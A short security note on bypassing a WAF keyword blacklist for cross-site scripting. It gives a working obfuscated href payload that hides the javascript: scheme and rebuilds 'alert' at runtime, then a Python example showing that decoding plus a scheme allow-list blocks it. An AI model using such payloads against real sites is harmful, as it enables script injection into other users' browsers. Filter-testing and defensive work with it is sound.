XSS bypass

  1. Blacklist bypass

https://x.com/erickfernandox/status/1845901672414945283

If the WAF blocks JavaScript terms such as 'alert' or 'confirm' in any form, write the term reversed, restore it at runtime with reverse(), and call it through self[].

Payload:

<a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)>
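
Defensive counterpart, as an added example that is not from the original post: a keyword match on the raw input misses this payload because `%0d`, `&Tab;` and `&colon;` hide the `javascript:` scheme and the function name is stored reversed, while decoding the value the way the browser does and allow-listing the scheme rejects it. `BLACKLIST`, `ALLOWED_SCHEMES` and the function names are assumptions chosen for illustration.

```python
import html
import re
from urllib.parse import unquote

# href value copied from the payload on this page.
PAGE_HREF = "%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)"

BLACKLIST = ("alert", "confirm", "javascript:")   # constructed keyword list
ALLOWED_SCHEMES = {"http", "https", "mailto"}     # assumed site policy

_URL_STRIPPED = re.compile(r"[\t\n\r]")           # removed by the browser's URL parser
_LEADING_C0 = re.compile(r"^[\x00-\x20]+")        # leading controls/space are trimmed
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")


def keyword_filter_passes(raw: str) -> bool:
    """The weak check: substring match on the raw, still-encoded input."""
    lowered = raw.lower()
    return not any(term in lowered for term in BLACKLIST)


def normalize_href(raw: str) -> str:
    """Approximate the URL the browser will act on (one decoding pass per layer)."""
    value = unquote(raw)              # transport layer: %0d -> CR
    value = html.unescape(value)      # attribute value: &Tab; -> TAB, &colon; -> ':'
    value = _URL_STRIPPED.sub("", value)
    return _LEADING_C0.sub("", value)


def href_is_allowed(raw: str) -> bool:
    """Allow relative URLs and allow-listed schemes; reject everything else."""
    match = _SCHEME.match(normalize_href(raw))
    return match is None or match.group(1).lower() in ALLOWED_SCHEMES


if __name__ == "__main__":
    print("keyword filter passes payload:", keyword_filter_passes(PAGE_HREF))
    print("normalized:", normalize_href(PAGE_HREF))
    print("scheme allow-list accepts payload:", href_is_allowed(PAGE_HREF))
```

The scheme check never looks for function names, so reversing or otherwise rebuilding 'alert' at runtime has no effect on the decision. It belongs alongside contextual output encoding, not in place of it.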
